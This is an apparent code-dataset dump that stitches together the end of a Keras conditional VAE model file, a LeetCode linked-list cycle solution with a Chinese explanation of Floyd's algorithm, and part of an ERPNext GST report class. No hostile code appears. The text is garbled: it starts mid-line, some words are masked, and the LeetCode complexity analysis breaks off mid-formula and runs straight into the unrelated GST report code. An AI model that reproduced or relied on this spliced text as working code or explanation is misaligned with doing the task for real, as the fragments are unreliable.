kl_weight\n\n self.x = Input(shape=[self.image_height, self.image_width, self.n_channels])\n\n self.phi = Input(shape=[self.phi_shape])\n\n self.u = Input(shape=[self.n_u])\n\n self.x_vgg = vgg.vgg_model(image_height=self.image_height,\n image_width=self.image_width)(self.x)\n\n self.x_vgg_shape = self.x_vgg.get_shape().as_list()[1]\n\n # self.x_vgg_prior = vgg.vgg_model(image_height=self.image_height,\n # image_width=self.image_width)(self.x)\n #\n # self.x_vgg_decoder = vgg.vgg_model(image_height=self.image_height,\n # image_width=self.image_width)(self.x)\n\n self.mu_encoder, self.log_var_encoder = self._encoder_mu_log_sigma()\n\n self.mu_prior, self.log_var_prior = 
self._prior_mu_log_sigma()\n\n self.u_prior = Lambda(self._sample_u)([self.mu_prior, self.log_var_prior])\n self.u_encoder = Lambda(self._sample_u)([self.mu_encoder, self.log_var_encoder])\n\n self.decoder_mu_seq, self.decoder_kappa_seq = self._decoder_net_seq()\n\n self.full_model = Model(inputs=[self.x, self.phi],\n outputs=concatenate([self.mu_prior,\n self.log_var_prior,\n self.mu_encoder,\n self.log_var_encoder,\n self.u_encoder,\n self.decoder_mu_seq(self.u_encoder),\n self.decoder_kappa_seq(self.u_encoder)]))\n\n self.full_model.compile(optimizer='adam', loss=self._cvae_elbo_loss_tf)\n\n self.decoder_model = Model(inputs=[self.x],\n outputs=concatenate([self.decoder_mu_seq(self.u_prior),\n self.decoder_kappa_seq(self.u_prior)]))\n\n def _encoder_mu_log_sigma(self):\n\n x_vgg_phi = concatenate([self.x_vgg, self.phi])\n\n hidden = Dense(512, activation='relu')(Dense(512, activation='relu')(x_vgg_phi))\n\n mu_encoder = Dense(self.n_u, activation='linear')(hidden)\n log_var_encoder = Dense(self.n_u, activation='linear')(hidden)\n\n return mu_encoder, log_var_encoder\n\n def _prior_mu_log_sigma(self):\n\n hidden = Dense(512, activation='relu')(self.x_vgg)\n\n mu_prior = Dense(self.n_u, activation='linear')(hidden)\n log_var_prior = Dense(self.n_u, activation='linear')(hidden)\n\n return mu_prior, log_var_prior\n\n def _sample_u(self, args):\n mu, log_var = args\n eps = K.random_normal(shape=K.shape(mu), mean=0., stddev=1.)\n return mu + K.exp(log_var / 2) * eps\n\n def _decoder_net_seq(self):\n decoder_mu = Sequential()\n decoder_mu.add(Dense(512, activation='relu',input_shape=[self.n_u]))\n # decoder_mu.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n decoder_mu.add(Dense(512, activation='relu'))\n decoder_mu.add(Dense(2, activation='linear'))\n decoder_mu.add(Lambda(lambda x: K.l2_normalize(x, axis=1)))\n\n decoder_kappa = Sequential()\n decoder_kappa.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n # decoder_kappa.add(Dense(512, activation='relu', input_shape=[self.n_u]))\n decoder_kappa.add(Dense(512, activation='relu'))\n decoder_kappa.add(Dense(1, activation='linear'))\n decoder_kappa.add(Lambda(lambda x: K.abs(x)))\n return decoder_mu, decoder_kappa\n\n def _cvae_elbo_loss_tf(self, y_true, model_output):\n mu_prior = model_output[:, 0:self.n_u]\n log_var_prior = model_output[:, self.n_u:self.n_u*2]\n mu_encoder = model_output[:, self.n_u*2:self.n_u*3]\n log_var_encoder = model_output[:, self.n_u*3:self.n_u*4]\n mu_pred = model_output[:, self.n_u*5:self.n_u*5+2]\n kappa_pred = model_output[:, self.n_u*5+2:]\n reconstruction_err = von_mises_log_likelihood_tf(y_true, mu_pred, kappa_pred)\n kl = gaussian_kl_divergence_tf(mu_encoder, log_var_encoder, mu_prior, log_var_prior)\n elbo = reconstruction_err - self.kl_weight*kl\n return K.mean(-elbo)\n\n def _cvae_elbo_loss_np(self, y_true, y_pred):\n mu_prior = y_pred[:, 0:self.n_u]\n log_var_prior = y_pred[:, self.n_u:self.n_u*2]\n mu_encoder = y_pred[:, self.n_u*2:self.n_u*3]\n log_var_encoder = y_pred[:, self.n_u*3:self.n_u*4]\n mu_pred = y_pred[:, self.n_u*5:self.n_u*5+2]\n kappa_pred = y_pred[:, self.n_u*5+2:]\n reconstruction_err = von_mises_log_likelihood_np(y_true, mu_pred, kappa_pred)\n kl = gaussian_kl_divergence_np(mu_encoder, log_var_encoder, mu_prior, log_var_prior)\n elbo = reconstruction_err - kl\n return elbo, reconstruction_err, kl\n\n def get_full_output(self, x, y):\n output = dict()\n y_pred = self.full_model.predict([x, y])\n output['mu_prior'] = y_pred[:, 0:self.n_u]\n output['log_sigma_prior'] 
= y_pred[:, self.n_u:self.n_u*2]\n output['mu_encoder'] = y_pred[:, self.n_u*2:self.n_u*3]\n output['log_sigma_encoder'] = y_pred[:, self.n_u*3:self.n_u*4]\n output['u_encoder_samples'] = y_pred[:, self.n_u*4:self.n_u*5]\n output['mu_pred'] = y_pred[:, self.n_u*5:self.n_u*5+2]\n output['kappa_pred'] = y_pred[:, self.n_u*5+2:]\n return output\n\n def generate_multiple_samples(self, x, n_samples=10):\n\n n_points = x.shape[0]\n cvae_kappa_preds = np.zeros([n_points, n_samples, 1])\n cvae_mu_preds = np.zeros([n_points, n_samples, 2])\n\n for i in range(0, n_samples):\n cvae_preds = self.decoder_model.predict(x)\n cvae_mu_preds[:, i, :] = cvae_preds[:, 0:2]\n cvae_kappa_preds[:, i, :] = cvae_preds[:, 2].reshape(-1, 1)\n\n return cvae_mu_preds, cvae_kappa_preds\n\n def get_multiple_predictions(self, x, y_bit, n_samples=5):\n\n n_points = x.shape[0]\n\n mu_bit_preds = np.zeros([n_points, n_samples, 2])\n kappa_preds = np.zeros([n_points, n_samples, 1])\n reconstruction_errs = np.zeros([n_points, n_samples, 1])\n kl_preds = np.zeros([n_points, n_samples, 1])\n elbo_preds = np.zeros([n_points, n_samples, 1])\n u_encoder = np.zeros([n_points, n_samples, self.n_u])\n\n mu_bit_preds_dec = np.zeros([n_points, n_samples, 2])\n kappa_preds_dec = np.zeros([n_points, n_samples, 1])\n\n for sid in range(0, n_samples):\n preds = self.full_model.predict([x, y_bit])\n mu_prior = preds[:, 0:self.n_u]\n log_sigma_prior = preds[:, self.n_u:self.n_u*2]\n mu_encoder = preds[:, self.n_u*2:self.n_u*3]\n log_sigma_encoder = preds[:, self.n_u*3:self.n_u*4]\n u_encoder[:, sid, :] = preds[:, self.n_u*4:self.n_u*5]\n mu_bit_preds[:, sid, :] = preds[:, self.n_u * 5:self.n_u * 5 + 2]\n kappa_preds[:, sid, :] = preds[:, self.n_u * 5 + 2:].reshape(-1, 1)\n elbo, reconstruction, kl = self._cvae_elbo_loss_np(y_bit, preds)\n reconstruction_errs[:, sid, :] = reconstruction\n kl_preds[:, sid, :] = kl\n elbo_preds[:, sid, :] = elbo\n preds_dec = self.decoder_model.predict(x, batch_size=100)\n mu_bit_preds_dec[:, sid, :] = preds_dec[:, 0:2]\n kappa_preds_dec[:, sid, :] = preds_dec[:, 2:].reshape(-1, 1)\n\n preds = dict()\n\n preds['mu_encoder'] = mu_encoder\n preds['log_sigma_encoder'] = log_sigma_encoder\n preds['mu_prior'] = mu_prior\n preds['log_sigma_prior'] = log_sigma_prior\n preds['u_encoder'] = u_encoder\n preds['mu_bit'] = mu_bit_preds\n preds['kappa'] = kappa_preds\n preds['reconstruction_err'] = reconstruction_errs\n preds['kl_div'] = kl_preds\n preds['elbo'] = elbo_preds\n preds['mu_bit_dec'] = mu_bit_preds_dec\n preds['kappa_dec'] = kappa_preds_dec\n preds['mu_rad_dec'] = np.deg2rad(bit2deg_multi(preds['mu_bit_dec']))\n preds['maxutil_deg_dec'] = maximum_expected_utility(np.rad2deg(preds['mu_rad_dec']))\n\n return preds\n\n def evaluate_multi(self, x, ytrue_deg, data_part, n_samples=50, verbose=1):\n\n ytrue_bit = deg2bit(ytrue_deg)\n\n results = dict()\n\n preds = self.get_multiple_predictions(x, ytrue_bit, n_samples=n_samples)\n\n results['elbo'] = np.mean(preds['elbo'])\n results['elbo_sem'] = sem(np.mean(preds['elbo'], axis=1))\n\n results['kl_div'] = np.mean(preds['kl_div'])\n results['kl_div_sem'] = sem(np.mean(preds['kl_div'], axis=1))\n\n ypreds = self.decoder_model.predict(x)\n ypreds_bit = ypreds[:, 0:2]\n kappa_preds = ypreds[:, 2:]\n\n ypreds_deg = bit2deg(ypreds_bit)\n\n loss = maad_from_deg(ytrue_deg, preds['maxutil_deg_dec'])\n results['maad_loss'] = np.mean(loss)\n results['maad_loss_sem'] = sem(loss, axis=None)\n\n importance_loglikelihoods = importance_loglikelihood(preds['mu_encoder'], 
preds['log_sigma_encoder'],\n preds['mu_prior'], preds['log_sigma_prior'],\n preds['u_encoder'],\n preds['mu_bit'], preds['kappa'],\n ytrue_bit)\n\n results['importance_log_likelihood'] = np.mean(importance_loglikelihoods)\n results['importance_log_likelihood_sem'] = sem(importance_loglikelihoods, axis=None)\n\n if verbose:\n\n print(\"MAAD error (%s) : %f ± %fSEM\" % (data_part, results['maad_loss'], results['maad_loss_sem']))\n\n print(\"ELBO (%s) : %f ± %fSEM\" % (data_part, results['elbo'], results['elbo_sem']))\n\n print(\"Approx Log-Likelihood, importance sampling (%s) : %f ± %fSEM\" %\n (data_part, results['importance_log_likelihood'], results['importance_log_likelihood_sem']))\n\n print(\"KL-div (%s) : %f ± %fSEM\" % (data_part, results['kl_div'], results['kl_div_sem']))\n\n return results\n","sub_path":"models/cvae_unconditioned_decoder.py","file_name":"cvae_unconditioned_decoder.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"37751560","text":"\n'''\n面试题 02.08. 环路检测\n给定一个有环链表,实现一个算法返回环路的开头节点。\n有环链表的定义:在链表中某个节点的next元素指向在它前面出现过的节点,则表明该链表存在环路。\n\n\n示例 1:\n\n输入:head = [3,2,0,-4], pos = 1\n输出:tail connects to node index 1\n解释:链表中有一个环,其尾部连接到第二个节点。\n\n示例 2:\n\n输入:head = [1,2], pos = 0\n输出:tail connects to node index 0\n解释:链表中有一个环,其尾部连接到第一个节点。\n\n示例 3:\n\n输入:head = [1], pos = -1\n输出:no cycle\n解释:链表中没有环。\n\n进阶:\n你是否可以不用额外空间解决此题?\n\n面试题 02.08. Linked List Cycle LCCI\nGiven a circular linked list, implement an algorithm that returns the node at the beginning of the loop.\n\nCircular linked list: A (corrupt) linked list in which a node's next pointer points to an earlier node, so as to make a loop in the linked list.\n\nExample 1:\n\nInput: head = [3,2,0,-4], pos = 1\nOutput: tail connects to node index 1\nExample 2:\n\nInput: head = [1,2], pos = 0\nOutput: tail connects to node index 0\nExample 3:\n\nInput: head = [1], pos = -1\nOutput: no cycle\nFollow Up:\nCan you solve it without using additional space?\n'''\n\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n slow = head\n fast = head\n\n while slow and fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n break\n if not slow or not fast or not fast.next :\n return None\n slow = head\n while slow != fast:\n slow = slow.next\n fast = fast.next\n # print(fast)\n return slow\n\n# solutions\n\n'''\n方法 1:哈希表\n想法\n\n如果我们用一个 Set 保存已经访问过的节点,我们可以遍历整个列表并返回第一个出现重复的节点。\n\n算法\n\n首先,我们分配一个 Set 去保存所有的列表节点。我们逐一遍历列表,检查当前节点是否出现过,如果节点已经出现过,那么一定形成了环且它是环的入口。否则如果有其他点是环的入口,我们应该先访问到其他节点而不是这个节点。其他情况,没有成环则直接返回 null 。\n\n算法会在遍历有限个节点后终止,这是因为输入列表会被分成两类:成环的和不成环的。一个不成欢的列表在遍历完所有节点后会到达 null - 即链表的最后一个元素后停止。一个成环列表可以想象成是一个不成环列表将最后一个 null 元素换成环的入口。\n\n如果 while 循环终止,我们返回 null 因为我们已经将所有的节点遍历了一遍且没有遇到重复的节点,这种情况下,列表是不成环的。对于循环列表, while 循环永远不会停止,但在某个节点上, if 条件会被满足并导致函数的退出。\n\nJavaPython\n\npublic class Solution {\n public ListNode detectCycle(ListNode head) {\n Set visited = new HashSet();\n\n ListNode node = head;\n while (node != null) {\n if (visited.contains(node)) {\n return node;\n }\n visited.add(node);\n node = node.next;\n }\n\n return null;\n }\n}\n复杂度分析\n\n时间复杂度:O(n)O(n)\n\n不管是成环还是不成环的输入,算法肯定都只会访问每个节点一次。对于非成环列表这是显而易见的,因为第 nn 个节点指向 null ,这会让循环退出。对于循环列表, if 条件满足时会导致函数的退出,因为它指向了某个已经访问过的节点。两种情况下,访问的节点数最多都是 nn 
个,所以运行时间跟节点数目成线性关系。\n\n空间复杂度:O(n)\n\n不管成环或者不成环的输入,我们都需要将每个节点插入 Set 中一次。两者唯一的区别是最后访问的节点后是 null 还是一个已经访问过的节点。因此,由于 Set 包含 n 个不同的节点,所需空间与节点数目也是线性关系的。\n\n\n\n方法 2:Floyd 算法\n想法\n\n当然一个跑得快的人和一个跑得慢的人在一个圆形的赛道上赛跑,会发生什么?在某一个时刻,跑得快的人一定会从后面赶上跑得慢的人。\n\n算法\n\nFloyd 的算法被划分成两个不同的 阶段 。在第一阶段,找出列表中是否有环,如果没有环,可以直接返回 null 并退出。否则,用 相遇节点 来找到环的入口。\n\n阶段 1\n\n这里我们初始化两个指针 - 快指针和慢指针。我们每次移动慢指针一步、快指针两步,直到快指针无法继续往前移动。如果在某次移动后,快慢指针指向了同一个节点,我们就返回它。否则,我们继续,直到 while 循环终止且没有返回任何节点,这种情况说明没有成环,我们返回 null 。\n\n下图说明了这个算法的工作方式:\n\n环中的节点从 0 到 C-1 编号,其中 C 是环的长度。非环节点从 -F 到 -1 编号,其中 F 是环以外节点的数目。 F 次迭代以后,慢指针指向了 0 且快指针指向某个节点 h ,其中 F ≡ h (mod C) 。这是因为快指针在 F 次迭代中遍历了 2F 个节点,且恰好有 F 个在环中。继续迭代 C-h 次,慢指针显然指向第 C-h 号节点,而快指针也会指向相同的节点。原因在于,快指针从 h 号节点出发遍历了 2(C-h) 个节点。\n\nh + 2(C-h) = 2C - h ≡ C-h (mod C)\n\n因此,如果列表是有环的,快指针和慢指针最后会同时指向同一个节点,因此被称为 相遇 。\n\n阶段 2\n\n给定阶段 1 找到的相遇点,阶段 2 将找到环的入口。首先我们初始化额外的两个指针: ptr1 ,指向链表的头, ptr2 指向相遇点。然后,我们每次将它们往前移动一步,直到它们相遇,它们相遇的点就是环的入口,返回这个节点。\n\n下面的图将更好的帮助理解和证明这个方法的正确性。\n\n我们利用已知的条件:慢指针移动 1 步,快指针移动 2 步,来说明它们相遇在环的入口处。(下面证明中的 tortoise 表示慢指针,hare 表示快指针)\n\n2 ⋅ distance(tortoise) = distance(hare)\n2(F+a) = F+a+b+a\n2F+2a = F+2a+b\nF = b\n\n因为 F=b ,指针从 h 点出发和从链表的头出发,最后会遍历相同数目的节点后在环的入口处相遇。\n\n下面的动画中动态地演示了整个算法过程:\n\nclass Solution(object):\n def getIntersect(self, head):\n tortoise = head\n hare = head\n\n # A fast pointer will either loop around a cycle and meet the slow\n # pointer or reach the `null` at the end of a non-cyclic list.\n while hare is not None and hare.next is not None:\n tortoise = tortoise.next\n hare = hare.next.next\n if tortoise == hare:\n return tortoise\n\n return None\n\n def detectCycle(self, head):\n if head is None:\n return None\n\n # If there is a cycle, the fast/slow pointers will intersect at some\n # node. 
Otherwise, there is no cycle, so we cannot find an e***ance to\n # a cycle.\n intersect = self.getIntersect(head)\n if intersect is None:\n return None\n\n # To find the e***ance to the cycle, we have two pointers traverse at\n # the same speed -- one from the front of the list, and the other from\n # the point of intersection.\n ptr1 = head\n ptr2 = intersect\n while ptr1 != ptr2:\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n\n return ptr1\n\n复杂度分析\n\n时间复杂度:O(n)O(n)\n\n对有环列表,快指针和慢指针在 F+C-hF+C−h 次迭代以后会指向同一个节点,正如上面正确性证明所示, F+C-h \\leq F+C = nF+C−h≤F+C=n ,所以阶段 1 运行时间在 O(n)O(n) 时间以内,阶段 2 运行 F < nF=%(from_date)s\"),\n\t\t\t(\"to_date\", \" and posting_date<=%(to_date)s\")):\n\t\t\t\tif self.filters.get(opts[0]):\n\t\t\t\t\tconditions += opts[1]\n\n\t\tcustomers = frappe.get_all(\"Customer\", filters={\"customer_type\": self.customer_type})\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2B\":\n\t\t\tconditions += \"\"\" and ifnull(invoice_type, '') != 'Export' and is_return != 1\n\t\t\t\tand customer in ('{0}')\"\"\".format(\"', '\".join([frappe.db.escape(c.name) for c in customers]))\n\n\t\tif self.filters.get(\"type_of_business\") in (\"B2C Large\", \"B2C Small\"):\n\t\t\tb2c_limit = frappe.db.get_single_value('GSt Settings', 'b2c_limit')\n\t\t\tif not b2c_limit:\n\t\t\t\tfrappe.throw(_(\"Please set B2C Limit in GST Settings.\"))\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2C Large\":\n\t\t\tconditions += \"\"\" and SUBSTR(place_of_supply, 1, 2) != SUBSTR(company_gstin, 1, 2)\n\t\t\t\tand grand_total > {0} and is_return != 1 and customer in ('{1}')\"\"\".\\\n\t\t\t\t\tformat(flt(b2c_limit), \"', '\".join([frappe.db.escape(c.name) for c in customers])\t)\n\t\t\t\t\t\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Small\":\n\t\t\tconditions += \"\"\" and (\n\t\t\t\tSUBSTR(place_of_supply, 1, 2) = SUBSTR(company_gstin, 1, 2)\n\t\t\t\t\tor grand_total <= {0}) and is_return != 1 and customer in ('{1}')\"\"\".\\\n\t\t\t\t\t\tformat(flt(b2c_limit), \"', '\".join([frappe.db.escape(c.name) for c in customers]))\n\n\t\telif self.filters.get(\"type_of_business\") == \"CDNR\":\n\t\t\tconditions += \"\"\" and is_return = 1 \"\"\"\n\n\t\telif self.filters.get(\"type_of_business\") == \"EXPORT\":\n\t\t\tconditions += \"\"\" and is_return !=1 and invoice_type = 'Export' \"\"\"\n\t\treturn conditions\n\n\tdef get_invoice_items(self):\n\t\tself.invoice_items = frappe._dict()\n\t\titems = frappe.db.sql(\"\"\"\n\t\t\tselect item_code, parent, base_net_amount\n\t\t\tfrom `tab%s Item`\n\t\t\twhere parent in (%s)\n\t\t\"\"\" % (self.doctype, ', '.join(['%s']*len(self.invoices))), tuple(self.invoices), as_dict=1)\n\n\t\tfor d in items:\n\t\t\tif d.item_code not in self.invoice_items.get(d.parent, {}):\n\t\t\t\tself.invoice_items.setdefault(d.parent, {}).setdefault(d.item_code, \n\t\t\t\t\tsum(i.get('base_net_amount', 0) for i in items \n\t\t\t\t\t\tif i.item_code == d.item_code and i.parent == d.parent))\n\n\tdef get_items_based_on_tax_rate(self):\n\t\tself.tax_details = frappe.db.sql(\"\"\"\n\t\t\tselect\n\t\t\t\tparent, account_head, item_wise_tax_detail, base_tax_amount_after_discount_amount\n\t\t\tfrom `tab%s`\n\t\t\twhere\n\t\t\t\tparenttype = %s and docstatus = 1\n\t\t\t\tand parent in (%s)\n\t\t\torder by account_head\n\t\t\"\"\" % (self.tax_doctype, '%s', ', '.join(['%s']*len(self.invoices.keys()))),\n\t\t\ttuple([self.doctype] + self.invoices.keys()))\n\n\t\tself.items_based_on_tax_rate = {}\n\t\tself.invoice_cess = frappe._dict()\n\t\tunidentified_gst_accounts = []\n\t\tfor parent, 
account, item_wise_tax_detail, tax_amount in self.tax_details:\n\t\t\tif account in self.gst_accounts.cess_account:\n\t\t\t\tself.invoice_cess.setdefault(parent, tax_amount)\n\t\t\telse:\n\t\t\t\tif item_wise_tax_detail:\n\t\t\t\t\ttry:\n\t\t\t\t\t\titem_wise_tax_detail = json.loads(item_wise_tax_detail)\n\t\t\t\t\t\tcgst_or_sgst = False\n\t\t\t\t\t\tif account in self.gst_accounts.cgst_account \\\n\t\t\t\t\t\t\tor account in self.gst_accounts.sgst_account:\n\t\t\t\t\t\t\tcgst_or_sgst = True\n\n\t\t\t\t\t\tif not (cgst_or_sgst or account in self.gst_accounts.igst_account):\n\t\t\t\t\t\t\tif \"gst\" in account.lower() and account not in unidentified_gst_accounts:\n\t\t\t\t\t\t\t\tunidentified_gst_accounts.append(account)\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tfor item_code, tax_amounts in item_wise_tax_detail.items():\n\t\t\t\t\t\t\ttax_rate = tax_amounts[0]\n\t\t\t\t\t\t\tif cgst_or_sgst:\n\t\t\t\t\t\t\t\ttax_rate *= 2\n\n\t\t\t\t\t\t\trate_based_dict = self.items_based_on_tax_rate\\\n\t\t\t\t\t\t\t\t.setdefault(parent, {}).setdefault(tax_rate, [])\n\t\t\t\t\t\t\tif item_code not in rate_based_dict:\n\t\t\t\t\t\t\t\trate_based_dict.append(item_code)\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tcontinue\n\t\tif unidentified_gst_accounts:\n\t\t\tfrappe.msgprint(_(\"Following accounts might be selected in GST Settings:\")\n\t\t\t\t+ \"
\" + \"
\".join(unidentified_gst_accounts), alert=True)\n\n\tdef get_gst_accounts(self):\n\t\tself.gst_accounts = frappe._dict()\n\t\tgst_settings_accounts = frappe.get_list(\"GST Account\",\n\t\t\tfilters={\"parent\": \"GST Settings\", \"company\": self.filters.company},\n\t\t\tfields=[\"cgst_account\", \"sgst_account\", \"igst_account\", \"cess_account\"])\n\n\t\tif not gst_settings_accounts:\n\t\t\tfrappe.throw(_(\"Please set GST Accounts in GST Settings\"))\n\n\t\tfor d in gst_settings_accounts:\n\t\t\tfor acc, val in d.items():\n\t\t\t\tself.gst_accounts.setdefault(acc, []).append(val)\n\n\tdef get_columns(self):\n\t\tself.tax_columns = [\n\t\t\t{\n\t\t\t\t\"fieldname\": \"rate\",\n\t\t\t\t\"label\": \"Rate\",\n\t\t\t\t\"fieldtype\": \"Int\",\n\t\t\t\t\"width\": 60\n\t\t\t},\n\t\t\t{\n\t\t\t\t\"fieldname\": \"taxable_value\",\n\t\t\t\t\"label\": \"Taxable Value\",\n\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\"width\": 100\n\t\t\t}\n\t\t]\n\t\tself.other_columns = []\n\n\t\tif self.filters.get(\"type_of_business\") == \"B2B\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_gstin\",\n\t\t\t\t\t\"label\": \"GSTIN/UIN of Recipient\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 150\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_name\",\n\t\t\t\t\t\"label\": \"Receiver Name\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\":80\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"reverse_charge\",\n\t\t\t\t\t\"label\": \"Reverse Charge\",\n\t\t\t\t\t\"fieldtype\": \"Data\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_type\",\n\t\t\t\t\t\"label\": \"Invoice Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t\t}\n\t\t\t\t]\n\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Large\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": 
\"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 130\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t\t}\n\t\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"CDNR\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_gstin\",\n\t\t\t\t\t\"label\": \"GSTIN/UIN of Recipient\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 150\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"customer_name\",\n\t\t\t\t\t\"label\": \"Receiver Name\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"return_against\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice/Advance Receipt date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"reason_for_issuing_document\",\n\t\t\t\t\t\"label\": \"Reason For Issuing document\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 140\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"pre_gst\",\n\t\t\t\t\t\"label\": \"PRE GST\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 80\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": 